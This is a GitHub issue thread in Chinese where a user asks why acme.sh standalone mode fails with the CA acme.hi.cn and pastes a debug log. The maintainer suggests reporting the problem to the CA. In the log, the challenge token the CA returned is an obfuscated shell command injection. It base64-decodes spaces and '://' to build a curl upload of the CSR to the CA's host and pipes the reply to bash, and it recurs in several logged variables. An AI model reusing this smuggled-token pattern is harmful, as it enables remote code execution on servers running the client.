### ISSUE TITLE
Standalone 模式为什么无法在其他CA工作

### ISSUE THREAD

**Issue by bbbe-me** [acmesh-official/acme.sh#4403]
https://www1.hi.cn
这家可以用ACME获取IP证书，由于服务器上没有Nginx所以只想用 Standalone 模式，这样不更新证书的时候端口是关闭的

使用默认的CA也就是ZeroSSL获取域名证书使用 Standalone 模式都是正常的，可以看到socat监听在80端口
/root/.acme.sh/acme.sh --issue --standalone -d test.com

但是使用上面那家指定CA的方法发现80端口无任何监听然后提示验证失败

Centos 7 系统 root 用户安装的 acme

尝试把这个CA设置为默认的CA也是不行，80端口无任何占用，防火墙开放，
按说 Standalone 模式只是验证方式的区别这和本地nginx验证没啥区别呀，只要能访问到验证文件不就行了，和CA应该没啥关系才对，希望帮看看什么原因

`[root@test ~]# /root/.acme.sh/acme.sh --issue -d 43.129.1.1 --standalone --server https://acme.hi.cn/directory --debug \
> --key-file        /data/43.129.1.1.key \
> --fullchain-file  /data/43.129.1.1.crt
[Mon Nov 21 15:28:47 CST 2022] Lets find script dir.
[Mon Nov 21 15:28:47 CST 2022] _SCRIPT_='/root/.acme.sh/acme.sh'
[Mon Nov 21 15:28:47 CST 2022] _script='/root/.acme.sh/acme.sh'
[Mon Nov 21 15:28:47 CST 2022] _script_home='/root/.acme.sh'
[Mon Nov 21 15:28:47 CST 2022] Using config home:/root/.acme.sh
https://github.com/acmesh-official/acme.sh
v3.0.5
[Mon Nov 21 15:28:47 CST 2022] Using server: https://acme.hi.cn/directory
[Mon Nov 21 15:28:47 CST 2022] Running cmd: issue
[Mon Nov 21 15:28:47 CST 2022] _main_domain='43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] _alt_domains='no'
[Mon Nov 21 15:28:47 CST 2022] Using config home:/root/.acme.sh
[Mon Nov 21 15:28:47 CST 2022] ACME_DIRECTORY='https://acme.hi.cn/directory'
[Mon Nov 21 15:28:47 CST 2022] DOMAIN_PATH='/root/.acme.sh/43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] Le_NextRenewTime
[Mon Nov 21 15:28:47 CST 2022] Using ACME_DIRECTORY: https://acme.hi.cn/directory
[Mon Nov 21 15:28:47 CST 2022] _init api for server: https://acme.hi.cn/directory
[Mon Nov 21 15:28:47 CST 2022] GET
[Mon Nov 21 15:28:47 CST 2022] url='https://acme.hi.cn/directory'
[Mon Nov 21 15:28:47 CST 2022] timeout=
[Mon Nov 21 15:28:47 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g '
[Mon Nov 21 15:28:47 CST 2022] ret='0'
[Mon Nov 21 15:28:47 CST 2022] ACME_KEY_CHANGE='https://acme.hi.cn/acme/key-change'
[Mon Nov 21 15:28:47 CST 2022] ACME_NEW_AUTHZ
[Mon Nov 21 15:28:47 CST 2022] ACME_NEW_ORDER='https://acme.hi.cn/acme/new-order'
[Mon Nov 21 15:28:47 CST 2022] ACME_NEW_ACCOUNT='https://acme.hi.cn/acme/new-account'
[Mon Nov 21 15:28:47 CST 2022] ACME_REVOKE_CERT='https://acme.hi.cn/acme/revoke-cert'
[Mon Nov 21 15:28:47 CST 2022] ACME_AGREEMENT='https://www1.hi.cn/EULA'
[Mon Nov 21 15:28:47 CST 2022] ACME_NEW_NONCE='https://acme.hi.cn/acme/new-nonce'
[Mon Nov 21 15:28:47 CST 2022] Using CA: https://acme.hi.cn/directory
[Mon Nov 21 15:28:47 CST 2022] _on_before_issue
[Mon Nov 21 15:28:47 CST 2022] _chk_main_domain='43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] _chk_alt_domains
[Mon Nov 21 15:28:47 CST 2022] Le_LocalAddress
[Mon Nov 21 15:28:47 CST 2022] d='43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] Check for domain='43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] _currentRoot='no'
[Mon Nov 21 15:28:47 CST 2022] Standalone mode.
[Mon Nov 21 15:28:47 CST 2022] _checkport='80'
[Mon Nov 21 15:28:47 CST 2022] _checkaddr
[Mon Nov 21 15:28:47 CST 2022] Using: ss
[Mon Nov 21 15:28:47 CST 2022] d
[Mon Nov 21 15:28:47 CST 2022] _saved_account_key_hash is not changed, skip register account.
[Mon Nov 21 15:28:47 CST 2022] Read key length:2048
[Mon Nov 21 15:28:47 CST 2022] _createcsr
[Mon Nov 21 15:28:47 CST 2022] Single domain='43.129.1.1'
[Mon Nov 21 15:28:47 CST 2022] Getting domain auth token for each domain
[Mon Nov 21 15:28:47 CST 2022] d
[Mon Nov 21 15:28:47 CST 2022] url='https://acme.hi.cn/acme/new-order'
[Mon Nov 21 15:28:47 CST 2022] payload='{"identifiers": [{"type":"ip","value":"43.129.1.1"}]}'
[Mon Nov 21 15:28:47 CST 2022] RSA key
[Mon Nov 21 15:28:47 CST 2022] HEAD
[Mon Nov 21 15:28:47 CST 2022] _post_url='https://acme.hi.cn/acme/new-nonce'
[Mon Nov 21 15:28:47 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g  -I  '
[Mon Nov 21 15:28:48 CST 2022] _ret='0'
[Mon Nov 21 15:28:48 CST 2022] POST
[Mon Nov 21 15:28:48 CST 2022] _post_url='https://acme.hi.cn/acme/new-order'
[Mon Nov 21 15:28:48 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g '
[Mon Nov 21 15:28:49 CST 2022] _ret='0'
[Mon Nov 21 15:28:49 CST 2022] code='201'
[Mon Nov 21 15:28:49 CST 2022] Le_LinkOrder='https://acme.hi.cn/acme/order/26kPZevyoku1Ey070NGxy7'
[Mon Nov 21 15:28:49 CST 2022] Le_OrderFinalize='https://acme.hi.cn/acme/order/26kPZevyoku1Ey070NGxy7/finalize'
[Mon Nov 21 15:28:49 CST 2022] url='https://acme.hi.cn/acme/authz/26kPZJvMKlfnDO6mKNGxy7'
[Mon Nov 21 15:28:49 CST 2022] payload
[Mon Nov 21 15:28:49 CST 2022] POST
[Mon Nov 21 15:28:49 CST 2022] _post_url='https://acme.hi.cn/acme/authz/26kPZJvMKlfnDO6mKNGxy7'
[Mon Nov 21 15:28:49 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g '
[Mon Nov 21 15:28:50 CST 2022] _ret='0'
[Mon Nov 21 15:28:50 CST 2022] code='200'
[Mon Nov 21 15:28:50 CST 2022] d='43.129.1.1'
[Mon Nov 21 15:28:50 CST 2022] Getting webroot for domain='43.129.1.1'
[Mon Nov 21 15:28:50 CST 2022] _w='no'
[Mon Nov 21 15:28:50 CST 2022] _currentRoot='no'
[Mon Nov 21 15:28:50 CST 2022] entry='"type":"http-01","url":"../pki-validation","status":"pending","token":"dd#acme.hi.cn/acme/v2/precheck-http/15359/23282#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)#"'
[Mon Nov 21 15:28:50 CST 2022] token='dd#acme.hi.cn/acme/v2/precheck-http/15359/23282#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)#'
[Mon Nov 21 15:28:50 CST 2022] uri='../pki-validation'
[Mon Nov 21 15:28:50 CST 2022] keyauthorization='dd#acme.hi.cn/acme/v2/precheck-http/15359/23282#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)#.92mS2whc1oNvCwSlZiPU5c9oDjZYmZhGqsO4jMi4Dms'
[Mon Nov 21 15:28:50 CST 2022] dvlist='43.129.1.1#dd#acme.hi.cn/acme/v2/precheck-http/15359/23282#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)#.92mS2whc1oNvCwSlZiPU5c9oDjZYmZhGqsO4jMi4Dms#../pki-validation#http-01#no'
[Mon Nov 21 15:28:50 CST 2022] d
[Mon Nov 21 15:28:50 CST 2022] vlist='43.129.1.1#dd#acme.hi.cn/acme/v2/precheck-http/15359/23282#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)#.92mS2whc1oNvCwSlZiPU5c9oDjZYmZhGqsO4jMi4Dms#../pki-validation#http-01#no,'
[Mon Nov 21 15:28:50 CST 2022] d='43.129.1.1'
[Mon Nov 21 15:28:50 CST 2022] ok, let's start to verify
[Mon Nov 21 15:28:50 CST 2022] Verifying: 43.129.1.1
[Mon Nov 21 15:28:50 CST 2022] d='43.129.1.1'
[Mon Nov 21 15:28:50 CST 2022] keyauthorization='dd'
[Mon Nov 21 15:28:50 CST 2022] uri='acme.hi.cn/acme/v2/precheck-http/15359/23282'
[Mon Nov 21 15:28:50 CST 2022] _currentRoot='/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)'
[Mon Nov 21 15:28:50 CST 2022] wellknown_path='/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)/.well-known/acme-challenge'
[Mon Nov 21 15:28:50 CST 2022] writing token:dd to /tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)/.well-known/acme-challenge/dd
[Mon Nov 21 15:28:50 CST 2022] Changing owner/group of .well-known to root:root
[Mon Nov 21 15:28:51 CST 2022] chown: cannot access ‘/tmp//.well-known’: No such file or directory
[Mon Nov 21 15:28:51 CST 2022] url='acme.hi.cn/acme/v2/precheck-http/15359/23282'
[Mon Nov 21 15:28:51 CST 2022] payload='{}'
[Mon Nov 21 15:28:51 CST 2022] POST
[Mon Nov 21 15:28:51 CST 2022] _post_url='acme.hi.cn/acme/v2/precheck-http/15359/23282'
[Mon Nov 21 15:28:51 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g '
[Mon Nov 21 15:28:51 CST 2022] _ret='0'
[Mon Nov 21 15:28:51 CST 2022] code='200'
[Mon Nov 21 15:28:51 CST 2022] trigger validation code: 200
[Mon Nov 21 15:28:51 CST 2022] 43.129.1.1:Verify error:fail to connect 43.129.1.1 by http protocol. please diagnose self: https://myssl.com/dns_check.html?brand=3&type=1&domain=http://43.129.1.1/.well-known/pki-validation/6107D53CFCC33B6873207F87543FCEE4.txt&txt=a49439aafe7ab2761b3d6d2d216144ab2a7d6ff7a11caaca05ac9216a2e87e3b%0Atrust-provider.com%0Aac160bfe#ssl_verify
[Mon Nov 21 15:28:51 CST 2022] Debug: get token url.
[Mon Nov 21 15:28:51 CST 2022] GET
[Mon Nov 21 15:28:51 CST 2022] url='http://43.129.1.1/.well-known/acme-challenge/dd'
[Mon Nov 21 15:28:51 CST 2022] timeout=1
[Mon Nov 21 15:28:51 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g  --connect-timeout 1'
[Mon Nov 21 15:28:51 CST 2022] Please refer to https://curl.haxx.se/libcurl/c/libcurl-errors.html for error code: 7
[Mon Nov 21 15:28:51 CST 2022] ret='7'
[Mon Nov 21 15:28:51 CST 2022] Debugging, skip removing: /tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/15359/23282?o=$_w|bash)/.well-known/acme-challenge/dd
[Mon Nov 21 15:28:51 CST 2022] pid
[Mon Nov 21 15:28:51 CST 2022] No need to restore nginx, skip.
[Mon Nov 21 15:28:51 CST 2022] _clearupdns
[Mon Nov 21 15:28:51 CST 2022] dns_entries
[Mon Nov 21 15:28:51 CST 2022] skip dns.
[Mon Nov 21 15:28:51 CST 2022] _on_issue_err
[Mon Nov 21 15:28:51 CST 2022] Please add '--debug' or '--log' to check more details.
[Mon Nov 21 15:28:51 CST 2022] See: https://github.com/acmesh-official/acme.sh/wiki/How-to-debug-acme.sh
[Mon Nov 21 15:28:52 CST 2022] url='acme.hi.cn/acme/v2/precheck-http/15359/23282'
[Mon Nov 21 15:28:52 CST 2022] payload='{}'
[Mon Nov 21 15:28:52 CST 2022] HEAD
[Mon Nov 21 15:28:52 CST 2022] _post_url='https://acme.hi.cn/acme/new-nonce'
[Mon Nov 21 15:28:52 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g  -I  '
[Mon Nov 21 15:28:52 CST 2022] _ret='0'
[Mon Nov 21 15:28:52 CST 2022] POST
[Mon Nov 21 15:28:52 CST 2022] _post_url='acme.hi.cn/acme/v2/precheck-http/15359/23282'
[Mon Nov 21 15:28:52 CST 2022] _CURL='curl --silent --dump-header /root/.acme.sh/http.header  -L  -g '
[Mon Nov 21 15:28:53 CST 2022] _ret='0'
[Mon Nov 21 15:28:53 CST 2022] code='200'
[Mon Nov 21 15:28:53 CST 2022] Diagnosis versions: 
openssl:openssl
OpenSSL 1.0.2k-fips  26 Jan 2017
apache:
apache doesn't exist.
nginx:
nginx version: nginx/1.18.0
built by gcc 4.9.2 20150212 (Red Hat 4.9.2-6) (GCC) 
built with OpenSSL 1.0.2k-fips  26 Jan 2017
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib64/nginx/modules --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-compat --with-file-aio --with-threads --with-http_addition_module --with-http_auth_request_module --with-http_dav_module --with-http_flv_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_mp4_module --with-http_random_index_module --with-http_realip_module --with-http_secure_link_module --with-http_slice_module --with-http_ssl_module --with-http_stub_status_module --with-http_sub_module --with-http_v2_module --with-mail --with-mail_ssl_module --with-stream --with-stream_realip_module --with-stream_ssl_module --with-stream_ssl_preread_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -m64 -mtune=generic -fPIC' --with-ld-opt='-Wl,-z,relro -Wl,-z,now -pie'
socat:
socat by Gerhard Rieger and contributors - see www.dest-unreach.org
socat version 1.7.3.2 on Aug  4 2017 04:57:10
   running on Linux version #1 SMP Thu Jun 29 10:01:10 EDT 2017, release 4.11.8-1.el7.elrepo.x86_64, machine x86_64
features:
  #define WITH_STDIO 1
  #define WITH_FDNUM 1
  #define WITH_FILE 1
  #define WITH_CREAT 1
  #define WITH_GOPEN 1
  #define WITH_TERMIOS 1
  #define WITH_PIPE 1
  #define WITH_UNIX 1
  #define WITH_ABSTRACT_UNIXSOCKET 1
  #define WITH_IP4 1
  #define WITH_IP6 1
  #define WITH_RAWIP 1
  #define WITH_GENERICSOCKET 1
  #define WITH_INTERFACE 1
  #define WITH_TCP 1
  #define WITH_UDP 1
  #define WITH_SCTP 1
  #define WITH_LISTEN 1
  #define WITH_SOCKS4 1
  #define WITH_SOCKS4A 1
  #define WITH_PROXY 1
  #define WITH_SYSTEM 1
  #define WITH_EXEC 1
  #define WITH_READLINE 1
  #define WITH_TUN 1
  #define WITH_PTY 1
  #define WITH_OPENSSL 1
  #undef WITH_FIPS
  #define WITH_LIBWRAP 1
  #define WITH_SYCLS 1
  #define WITH_FILAN 1
  #define WITH_RETRY 1
  #define WITH_MSGLEVEL 0 /*debug*/`

**Comment by Neilpang** [comment]
如果别的 CA 都可以正常工作, 请直接给 相关 CA 报bug.

**Comment by bbbe-me** [comment]
> 如果不同的CA都可以正常工作，请直接给相关CA报bug。

感谢回复，刚进这家的用户群看了下，还真是用不了 standalone 说是技术问题
真的是醉了，真没想到这不就验证方式不同嘛，为啥还要商家支持才可以，郁闷 、、、、、
